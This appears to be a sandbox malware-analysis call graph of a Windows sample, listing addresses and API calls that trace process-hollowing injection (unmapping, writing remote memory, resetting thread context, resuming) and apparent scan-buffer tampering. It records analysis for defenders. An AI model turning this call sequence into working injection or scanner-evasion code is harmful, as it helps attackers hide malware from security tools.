2b29527 37489->37490 37491 2b147ec 11 API calls 37490->37491 37492 2b29558 37491->37492 37493 2b289d0 20 API calls 37492->37493 37494 2b2957c 37493->37494 37495 2b14860 11 API calls 37494->37495 37496 2b29598 37495->37496 37497 2b147ec 11 API calls 37496->37497 37498 2b295c9 37497->37498 37499 2b289d0 20 API calls 37498->37499 37500 2b295ed GetThreadContext 37499->37500 37500->37384 37501 2b2960f 37500->37501 37502 2b14860 11 API calls 37501->37502 37503 2b2962b 37502->37503 37504 2b147ec 11 API calls 37503->37504 37505 2b2965c 37504->37505 37506 2b289d0 20 API calls 37505->37506 37507 2b29680 37506->37507 37508 2b14860 11 API calls 37507->37508 37509 2b2969c 37508->37509 37510 2b147ec 11 API calls 37509->37510 37511 2b296cd 37510->37511 37512 2b289d0 20 API calls 37511->37512 37513 2b296f1 37512->37513 37514 2b14860 11 API calls 37513->37514 37515 2b2970d 37514->37515 37516 2b147ec 11 API calls 37515->37516 37517 2b2973e 37516->37517 37518 2b289d0 20 API calls 37517->37518 37519 2b29762 37518->37519 37520 2b14860 11 API calls 37519->37520 37521 2b2977e 37520->37521 37522 2b147ec 11 API calls 37521->37522 37523 2b297af 37522->37523 37524 2b289d0 20 API calls 37523->37524 37525 2b297d3 37524->37525 37526 2b14860 11 API calls 37525->37526 37527 2b297ef 37526->37527 37528 2b147ec 11 API calls 37527->37528 37529 2b29820 37528->37529 37530 2b289d0 20 API calls 37529->37530 37531 2b29844 37530->37531 37832 2b28400 37531->37832 37534 2b29878 37536 2b14860 11 API calls 37534->37536 37535 2b29b7f 37537 2b14860 11 API calls 37535->37537 37539 2b29894 37536->37539 37538 2b29b9b 37537->37538 37540 2b147ec 11 API calls 37538->37540 37541 2b147ec 11 API calls 37539->37541 37542 2b29bcc 37540->37542 37543 2b298c5 37541->37543 37544 2b289d0 20 API calls 37542->37544 37545 2b289d0 20 API calls 37543->37545 37546 2b29b78 37544->37546 37547 2b298e9 37545->37547 37548 2b14860 11 API calls 37546->37548 37549 2b14860 11 API calls 37547->37549 37550 2b29c0c 37548->37550 37551 2b29905 37549->37551 37552 2b147ec 11 API calls 37550->37552 37553 2b147ec 11 API calls 37551->37553 37554 2b29c3d 37552->37554 37555 2b29936 37553->37555 37556 2b289d0 20 API calls 37554->37556 37557 2b289d0 20 API calls 37555->37557 37558 2b29c61 37556->37558 37559 2b2995a 37557->37559 37560 2b14860 11 API calls 37558->37560 37561 2b14860 11 API calls 37559->37561 37563 2b29c7d 37560->37563 37562 2b29976 37561->37562 37565 2b147ec 11 API calls 37562->37565 37564 2b147ec 11 API calls 37563->37564 37566 2b29cae 37564->37566 37567 2b299a7 37565->37567 37568 2b289d0 20 API calls 37566->37568 37569 2b289d0 20 API calls 37567->37569 37570 2b29cd2 37568->37570 37571 2b299cb 37569->37571 37572 2b14860 11 API calls 37570->37572 37846 2b28670 37571->37846 37579 2b29cee 37572->37579 37575 2b299e3 37578 2b27a2c 18 API calls 37575->37578 37576 2b29a0b 37577 2b14860 11 API calls 37576->37577 37583 2b29a27 37577->37583 37580 2b29a04 37578->37580 37581 2b147ec 11 API calls 37579->37581 37582 2b14860 11 API calls 37580->37582 37585 2b29d1f 37581->37585 37586 2b29a98 37582->37586 37584 2b147ec 11 API calls 37583->37584 37590 2b29a58 37584->37590 37587 2b289d0 20 API calls 37585->37587 37588 2b147ec 11 API calls 37586->37588 37589 2b29d43 37587->37589 37594 2b29ac9 37588->37594 37591 2b27a2c 18 API calls 37589->37591 37593 2b289d0 20 API calls 37590->37593 37592 2b29d64 37591->37592 37592->37384 37595 2b14860 11 API calls 37592->37595 37593->37580 37596 2b289d0 20 API calls 37594->37596 37599 2b29d92 37595->37599 37597 2b29aed 37596->37597 37598 2b14860 11 API calls 37597->37598 37601 2b29b09 37598->37601 37600 2b147ec 11 API calls 37599->37600 37603 2b29dc3 37600->37603 37602 2b147ec 11 API calls 37601->37602 37606 2b29b3a 37602->37606 37604 2b289d0 20 API calls 37603->37604 37605 2b29de7 37604->37605 37607 2b14860 11 API calls 37605->37607 37608 2b289d0 20 API calls 37606->37608 37611 2b29e03 37607->37611 37609 2b29b5e 37608->37609 37860 2b27a2c 37609->37860 37612 2b147ec 11 API calls 37611->37612 37613 2b29e34 37612->37613 37614 2b289d0 20 API calls 37613->37614 37615 2b29e58 37614->37615 37874 2b28c80 37615->37874 37617 2b14860 11 API calls 37619 2b29edf 37617->37619 37618 2b29e5f 37618->37617 37620 2b147ec 11 API calls 37619->37620 37621 2b29f10 37620->37621 37622 2b289d0 20 API calls 37621->37622 37623 2b29f34 37622->37623 37624 2b14860 11 API calls 37623->37624 37625 2b29f50 37624->37625 37626 2b147ec 11 API calls 37625->37626 37627 2b29f81 37626->37627 37628 2b289d0 20 API calls 37627->37628 37629 2b29fa5 37628->37629 37630 2b14860 11 API calls 37629->37630 37631 2b29fc1 37630->37631 37632 2b147ec 11 API calls 37631->37632 37633 2b29ff2 37632->37633 37634 2b289d0 20 API calls 37633->37634 37635 2b2a016 37634->37635 37636 2b27d78 18 API calls 37635->37636 37637 2b2a033 37636->37637 37638 2b14860 11 API calls 37637->37638 37639 2b2a04f 37638->37639 37640 2b147ec 11 API calls 37639->37640 37641 2b2a080 37640->37641 37642 2b289d0 20 API calls 37641->37642 37643 2b2a0a4 37642->37643 37644 2b14860 11 API calls 37643->37644 37645 2b2a0c0 37644->37645 37646 2b147ec 11 API calls 37645->37646 37647 2b2a0f1 37646->37647 37648 2b289d0 20 API calls 37647->37648 37649 2b2a115 37648->37649 37650 2b14860 11 API calls 37649->37650 37651 2b2a131 37650->37651 37652 2b147ec 11 API calls 37651->37652 37653 2b2a162 37652->37653 37654 2b289d0 20 API calls 37653->37654 37655 2b2a186 37654->37655 37656 2b27d78 18 API calls 37655->37656 37657 2b2a1a6 37656->37657 37658 2b14860 11 API calls 37657->37658 37659 2b2a1c2 37658->37659 37660 2b147ec 11 API calls 37659->37660 37661 2b2a1f3 37660->37661 37662 2b289d0 20 API calls 37661->37662 37663 2b2a217 37662->37663 37664 2b14860 11 API calls 37663->37664 37665 2b2a233 37664->37665 37666 2b147ec 11 API calls 37665->37666 37667 2b2a264 37666->37667 37668 2b289d0 20 API calls 37667->37668 37669 2b2a288 37668->37669 37670 2b14860 11 API calls 37669->37670 37671 2b2a2a4 37670->37671 37672 2b147ec 11 API calls 37671->37672 37673 2b2a2d5 37672->37673 37674 2b289d0 20 API calls 37673->37674 37675 2b2a2f9 SetThreadContext NtResumeThread 37674->37675 37676 2b14860 11 API calls 37675->37676 37677 2b2a345 37676->37677 37678 2b147ec 11 API calls 37677->37678 37679 2b2a376 37678->37679 37680 2b289d0 20 API calls 37679->37680 37681 2b2a39a 37680->37681 37682 2b14860 11 API calls 37681->37682 37683 2b2a3b6 37682->37683 37684 2b147ec 11 API calls 37683->37684 37685 2b2a3e7 37684->37685 37686 2b289d0 20 API calls 37685->37686 37687 2b2a40b 37686->37687 37688 2b14860 11 API calls 37687->37688 37689 2b2a427 37688->37689 37690 2b147ec 11 API calls 37689->37690 37691 2b2a458 37690->37691 37692 2b289d0 20 API calls 37691->37692 37693 2b2a47c 37692->37693 37694 2b14860 11 API calls 37693->37694 37695 2b2a498 37694->37695 37696 2b147ec 11 API calls 37695->37696 37697 2b2a4c9 37696->37697 37698 2b289d0 20 API calls 37697->37698 37699 2b2a4ed 37698->37699 37700 2b12c2c 11 API calls 37699->37700 37701 2b2a4fc 37700->37701 37702 2b14860 11 API calls 37701->37702 37703 2b2a51e 37702->37703 37704 2b147ec 11 API calls 37703->37704 37705 2b2a54f 37704->37705 37706 2b289d0 20 API calls 37705->37706 37707 2b2a573 37706->37707 37708 2b2894c 21 API calls 37707->37708 37709 2b2a587 37708->37709 37710 2b2894c 21 API calls 37709->37710 37711 2b2a59b 37710->37711 37712 2b2894c 21 API calls 37711->37712 37713 2b2a5af 37712->37713 37714 2b14860 11 API calls 37713->37714 37715 2b2a5cb 37714->37715 37716 2b147ec 11 API calls 37715->37716 37717 2b2a5fc 37716->37717 37718 2b289d0 20 API calls 37717->37718 37719 2b2a620 37718->37719 37720 2b2894c 21 API calls 37719->37720 37721 2b2a634 37720->37721 37722 2b2894c 21 API calls 37721->37722 37723 2b2a648 37722->37723 37724 2b14860 11 API calls 37723->37724 37725 2b2a664 37724->37725 37726 2b147ec 11 API calls 37725->37726 37727 2b2a682 37726->37727 37728 2b2894c 21 API calls 37727->37728 37729 2b2a69a 37728->37729 37730 2b14860 11 API calls 37729->37730 37731 2b2a6b6 37730->37731 37732 2b147ec 11 API calls 37731->37732 37733 2b2a6d4 37732->37733 37734 2b2894c 21 API calls 37733->37734 37735 2b2a6ec 37734->37735 37736 2b2894c 21 API calls 37735->37736 37737 2b2a700 37736->37737 37738 2b2894c 21 API calls 37737->37738 37739 2b2a714 37738->37739 37740 2b2894c 21 API calls 37739->37740 37741 2b2a728 37740->37741 37742 2b2894c 21 API calls 37741->37742 37743 2b2a73c 37742->37743 37744 2b14860 11 API calls 37743->37744 37745 2b2a758 37744->37745 37746 2b147ec 11 API calls 37745->37746 37747 2b2a776 37746->37747 37748 2b2894c 21 API calls 37747->37748 37749 2b2a78e 37748->37749 37750 2b14860 11 API calls 37749->37750 37751 2b2a7aa 37750->37751 37752 2b147ec 11 API calls 37751->37752 37753 2b2a7c8 37752->37753 37754 2b2894c 21 API calls 37753->37754 37755 2b2a7e0 37754->37755 37756 2b14860 11 API calls 37755->37756 37757 2b2a7fc 37756->37757 37758 2b147ec 11 API calls 37757->37758 37759 2b2a81a 37758->37759 37760 2b2894c 21 API calls 37759->37760 37761 2b2a832 37760->37761 37762 2b14860 11 API calls 37761->37762 37763 2b2a84e 37762->37763 37764 2b147ec 11 API calls 37763->37764 37765 2b2a86c 37764->37765 37766 2b2894c 21 API calls 37765->37766 37767 2b2a884 37766->37767 37768 2b2894c 21 API calls 37767->37768 37769 2b2a8a3 37768->37769 37770 2b2894c 21 API calls 37769->37770 37770->37384 37772 2b14530 11 API calls 37771->37772 37773 2b2835b 37772->37773 37774 2b14860 11 API calls 37773->37774 37775 2b2837a 37774->37775 37776 2b281cc 17 API calls 37775->37776 37777 2b2838d 37776->37777 37778 2b28274 15 API calls 37777->37778 37779 2b28393 FlushInstructionCache 37778->37779 37780 2b283b9 37779->37780 37781 2b144dc 11 API calls 37780->37781 37782 2b283c1 37781->37782 37782->37280 37784 2b14530 11 API calls 37783->37784 37785 2b285df 37784->37785 37786 2b14860 11 API calls 37785->37786 37787 2b285fe 37786->37787 37788 2b281cc 17 API calls 37787->37788 37789 2b28611 37788->37789 37790 2b28274 15 API calls 37789->37790 37791 2b28617 WinExec 37790->37791 37792 2b28639 37791->37792 37793 2b144dc 11 API calls 37792->37793 37794 2b28641 37793->37794 37794->36612 37795->36671 37796->36830 37797->36884 37798->37005 37799->36835 37800->36929 37802 2b28973 GetProcAddress 37801->37802 37803 2b289bb 37801->37803 37804 2b289b0 FreeLibrary 37802->37804 37805 2b2898d 37802->37805 37803->37128 37804->37803 37806 2b27d78 18 API calls 37805->37806 37807 2b289a5 37806->37807 37807->37804 37808->37338 37809->37338 37811 2b149a4 GetFileAttributesA 37810->37811 37811->37343 37813 2b14f26 SysAllocStringLen 37812->37813 37814 2b14f3c 37812->37814 37813->37814 37815 2b14c30 37813->37815 37814->37352 37815->37812 37816->37355 37818 2b14c74 37817->37818 37819 2b14c66 SysFreeString 37817->37819 37818->37362 37819->37818 37821 2b14530 11 API calls 37820->37821 37822 2b287ab 37821->37822 37823 2b14860 11 API calls 37822->37823 37824 2b287ca 37823->37824 37825 2b281cc 17 API calls 37824->37825 37826 2b287dd 37825->37826 37827 2b28274 15 API calls 37826->37827 37828 2b287e3 CreateProcessAsUserW 37827->37828 37829 2b28827 37828->37829 37830 2b144dc 11 API calls 37829->37830 37831 2b2882f 37830->37831 37831->37455 37831->37457 37833 2b14530 11 API calls 37832->37833 37834 2b28425 37833->37834 37835 2b2798c 12 API calls 37834->37835 37836 2b28432 37835->37836 37837 2b147ec 11 API calls 37836->37837 37838 2b2843f 37837->37838 37839 2b281cc 17 API calls 37838->37839 37840 2b28452 37839->37840 37841 2b28274 15 API calls 37840->37841 37842 2b28458 NtReadVirtualMemory 37841->37842 37843 2b28486 37842->37843 37844 2b14500 11 API calls 37843->37844 37845 2b28493 37844->37845 37845->37534 37845->37535 37847 2b14530 11 API calls 37846->37847 37848 2b28695 37847->37848 37849 2b2798c 12 API calls 37848->37849 37850 2b286a2 37849->37850 37851 2b147ec 11 API calls 37850->37851 37852 2b286af 37851->37852 37853 2b281cc 17 API calls 37852->37853 37854 2b286c2 37853->37854 37855 2b28274 15 API calls 37854->37855 37856 2b286c8 NtUnmapViewOfSection 37855->37856 37857 2b286e8 37856->37857 37858 2b14500 11 API calls 37857->37858 37859 2b286f5 37858->37859 37859->37575 37859->37576 37861 2b14530 11 API calls 37860->37861 37862 2b27a51 37861->37862 37863 2b2798c 12 API calls 37862->37863 37864 2b27a5e 37863->37864 37865 2b147ec 11 API calls 37864->37865 37866 2b27a6b 37865->37866 37867 2b281cc 17 API calls 37866->37867 37868 2b27a7e 37867->37868 37869 2b28274 15 API calls 37868->37869 37870 2b27a84 NtAllocateVirtualMemory 37869->37870 37871 2b27ab5 37870->37871 37872 2b14500 11 API calls 37871->37872 37873 2b27ac2 37872->37873 37873->37546 37875 2b12c10 11 API calls 37874->37875 37876 2b28cb6 37875->37876 37876->37618 37877 2b14edc 37878 2b14ee9 37877->37878 37881 2b14ef0 37877->37881 37883 2b14c38 37878->37883 37889 2b14c50 37881->37889 37884 2b14c4c 37883->37884 37885 2b14c3c SysAllocStringLen 37883->37885 37884->37881 37885->37884 37886 2b14c30 37885->37886 37887 2b14f26 SysAllocStringLen 37886->37887 37888 2b14f3c 37886->37888 37887->37886 37887->37888 37888->37881 37890 2b14c56 SysFreeString 37889->37890 37891 2b14c5c 37889->37891 37890->37891 37892 2b11c6c 37893 2b11d04 37892->37893 37894 2b11c7c 37892->37894 37897 2b11f58 37893->37897 37898 2b11d0d 37893->37898 37895 2b11cc0 37894->37895 37896 2b11c89 37894->37896 37899 2b11724 10 API calls 37895->37899 37900 2b11c94 37896->37900 37940 2b11724 37896->37940 37901 2b11fec 37897->37901 37904 2b11f68 37897->37904 37905 2b11fac 37897->37905 37902 2b11d25 37898->37902 37916 2b11e24 37898->37916 37923 2b11cd7 37899->37923 37907 2b11d2c 37902->37907 37908 2b11d48 37902->37908 37913 2b11dfc 37902->37913 37911 2b11724 10 API calls 37904->37911 37910 2b11fb2 37905->37910 37914 2b11724 10 API calls 37905->37914 37906 2b11e7c 37912 2b11724 10 API calls 37906->37912 37925 2b11e95 37906->37925 37917 2b11d79 Sleep 37908->37917 37932 2b11d9c 37908->37932 37909 2b11cfd 37930 2b11f82 37911->37930 37927 2b11f2c 37912->37927 37918 2b11724 10 API calls 37913->37918 37931 2b11fc1 37914->37931 37915 2b11cb9 37916->37906 37920 2b11e55 Sleep 37916->37920 37916->37925 37921 2b11d91 Sleep 37917->37921 37917->37932 37935 2b11e05 37918->37935 37919 2b11fa7 37920->37906 37924 2b11e6f Sleep 37920->37924 37921->37908 37922 2b11ca1 37922->37915 37964 2b11a8c 37922->37964 37923->37909 37929 2b11a8c 8 API calls 37923->37929 37924->37916 37927->37925 37934 2b11a8c 8 API calls 37927->37934 37928 2b11e1d 37929->37909 37930->37919 37933 2b11a8c 8 API calls 37930->37933 37931->37919 37936 2b11a8c 8 API calls 37931->37936 37933->37919 37937 2b11f50 37934->37937 37935->37928 37938 2b11a8c 8 API calls 37935->37938 37939 2b11fe4 37936->37939 37938->37928 37941 2b11968 37940->37941 37949 2b1173c 37940->37949 37942 2b11a80 37941->37942 37943 2b11938 37941->37943 37945 2b11684 VirtualAlloc 37942->37945 37946 2b11a89 37942->37946 37948 2b11986 37943->37948 37950 2b11947 Sleep 37943->37950 37944 2b1174e 37951 2b1175d 37944->37951 37955 2b1182c 37944->37955 37958 2b1180a Sleep 37944->37958 37947 2b116af 37945->37947 37956 2b116bf 37945->37956 37946->37922 37981 2b11644 37947->37981 37959 2b119a4 37948->37959 37960 2b115cc VirtualAlloc 37948->37960 37949->37944 37954 2b117cb Sleep 37949->37954 37950->37948 37952 2b1195d Sleep 37950->37952 37951->37922 37952->37943 37954->37944 37957 2b117e4 Sleep 37954->37957 37963 2b11838 37955->37963 37987 2b115cc 37955->37987 37956->37922 37957->37949 37958->37955 37961 2b11820 Sleep 37958->37961 37959->37922 37960->37959 37961->37944 37963->37922 37965 2b11aa1 37964->37965 37966 2b11b6c 37964->37966 37968 2b11aa7 37965->37968 37971 2b11b13 Sleep 37965->37971 37967 2b116e8 37966->37967 37966->37968 37970 2b11c66 37967->37970 37972 2b11644 2 API calls 37967->37972 37969 2b11ab0 37968->37969 37974 2b11b4b Sleep 37968->37974 37977 2b11b81 37968->37977 37969->37915 37970->37915 37971->37968 37973 2b11b2d Sleep 37971->37973 37975 2b116f5 VirtualFree 37972->37975 37973->37965 37976 2b11b61 Sleep 37974->37976 37974->37977 37978 2b1170d 37975->37978 37976->37968 37979 2b11c00 VirtualFree 37977->37979 37980 2b11ba4 37977->37980 37978->37915 37979->37915 37980->37915 37982 2b11681 37981->37982 37983 2b1164d 37981->37983 37982->37956 37983->37982 37984 2b1164f Sleep 37983->37984 37985 2b11664 37984->37985 37985->37982 37986 2b11668 Sleep 37985->37986 37986->37983 37991 2b11560 37987->37991 37989 2b115d4 VirtualAlloc 37990 2b115eb 37989->37990 37990->37963 37992 2b11500 37991->37992 37992->37989 37993 2b3d2fc 38003 2b1656c 37993->38003 37997 2b3d32a 38008 2b3c35c timeSetEvent 37997->38008 37999 2b3d334 38000 2b3d342 GetMessageA 37999->38000 38001 2b3d352 38000->38001 38002 2b3d336 TranslateMessage DispatchMessageA 38000->38002 38002->38000 38004 2b16577 38003->38004 38009 2b14198 38004->38009 38007 2b142ac SysFreeString SysReAllocStringLen SysAllocStringLen 38007->37997 38008->37999 38010 2b141de 38009->38010 38011 2b14257 38010->38011 38012 2b143e8 38010->38012 38023 2b14130 38011->38023 38015 2b14419 38012->38015 38018 2b1442a 38012->38018 38028 2b1435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 38015->38028 38017 2b14423 38017->38018 38019 2b1446f FreeLibrary 38018->38019 38020 2b14493 38018->38020 38019->38018 38021 2b144a2 ExitProcess 38020->38021 38022 2b1449c 38020->38022 38022->38021 38024 2b14173 38023->38024 38025 2b14140 38023->38025 38024->38007 38025->38024 38027 2b115cc VirtualAlloc 38025->38027 38029 2b15868 38025->38029 38027->38025 38028->38017 38030 2b15894 38029->38030 38031 2b15878 GetModuleFileNameA 38029->38031 38030->38025 38033 2b15acc GetModuleFileNameA RegOpenKeyExA 38031->38033 38034 2b15b4f 38033->38034 38035 2b15b0f RegOpenKeyExA 38033->38035 38051 2b15908 12 API calls 38034->38051 38035->38034 38036 2b15b2d RegOpenKeyExA 38035->38036 38036->38034 38038 2b15bd8 lstrcpynA GetThreadLocale GetLocaleInfoA 38036->38038 38042 2b15cf2 38038->38042 38043 2b15c0f 38038->38043 38039 2b15b74 RegQueryValueExA 38040 2b15b94 RegQueryValueExA 38039->38040 38041 2b15bb2 RegCloseKey 38039->38041 38040->38041 38041->38030 38042->38030 38043->38042 38045 2b15c1f lstrlenA 38043->38045 38046 2b15c37 38045->38046 38046->38042 38047 2b15c84 38046->38047 38048 2b15c5c lstrcpynA LoadLibraryExA 38046->38048 38047->38042 38049 2b15c8e lstrcpynA LoadLibraryExA 38047->38049 38048->38047 38049->38042 38050 2b15cc0 lstrcpynA LoadLibraryExA 38049->38050 38050->38042 38051->38039

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 6027 2b28d70-2b28d73 6028 2b28d78-2b28d7d 6027->6028 6028->6028 6029 2b28d7f-2b28e66 call 2b14990 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 6028->6029 6060 2b2a8b7-2b2a921 call 2b14500 * 2 call 2b14c60 call 2b14500 call 2b144dc call 2b14500 * 2 6029->6060 6061 2b28e6c-2b28f47 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 6029->6061 6061->6060 6105 2b28f4d-2b29275 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b130d4 * 2 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14de0 call 2b14df0 call 2b28788 6061->6105 6214 2b29277-2b292e3 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 6105->6214 6215 2b292e8-2b29609 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b12ee0 call 2b12f08 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 GetThreadContext 6105->6215 6214->6215 6215->6060 6323 2b2960f-2b29872 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b28400 6215->6323 6396 2b29878-2b299e1 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b28670 6323->6396 6397 2b29b7f-2b29beb call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 6323->6397 6487 2b299e3-2b29a09 call 2b27a2c 6396->6487 6488 2b29a0b-2b29a77 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 6396->6488 6424 2b29bf0-2b29d70 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b27a2c 6397->6424 6424->6060 6528 2b29d76-2b29e6f call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b28c80 6424->6528 6495 2b29a7c-2b29b73 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b27a2c 6487->6495 6488->6495 6567 2b29b78-2b29b7d 6495->6567 6579 2b29ec3-2b2a61b call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b27d78 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b27d78 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 SetThreadContext NtResumeThread call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b12c2c call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b2894c * 3 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 6528->6579 6580 2b29e71-2b29ebe call 2b28b78 call 2b28b6c 6528->6580 6567->6424 6805 2b2a620-2b2a8b2 call 2b2894c * 2 call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c * 5 call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b28080 call 2b2894c * 2 6579->6805 6580->6579 6805->6060
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,74AD0000,00000000,00000000), ref: 02B28AAA
                                                                                                                                  • Part of subcall function 02B28788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B28814
                                                                                                                                • GetThreadContext.KERNEL32(000008A0,02B97424,ScanString,02B973A8,02B2A93C,UacInitialize,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,UacInitialize,02B973A8), ref: 02B29602
                                                                                                                                  • Part of subcall function 02B28400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B28471
                                                                                                                                  • Part of subcall function 02B28670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02B286D5
                                                                                                                                  • Part of subcall function 02B27A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B27A9F
                                                                                                                                  • Part of subcall function 02B27D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC
                                                                                                                                • SetThreadContext.KERNEL32(000008A0,02B97424,ScanBuffer,02B973A8,02B2A93C,ScanString,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,00000888,00238FF8,02B974FC,00000004,02B97500), ref: 02B2A317
                                                                                                                                • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000008A0,00000000,000008A0,02B97424,ScanBuffer,02B973A8,02B2A93C,ScanString,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,00000888,00238FF8,02B974FC), ref: 02B2A324
                                                                                                                                  • Part of subcall function 02B2894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
                                                                                                                                  • Part of subcall function 02B2894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
                                                                                                                                  • Part of subcall function 02B2894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
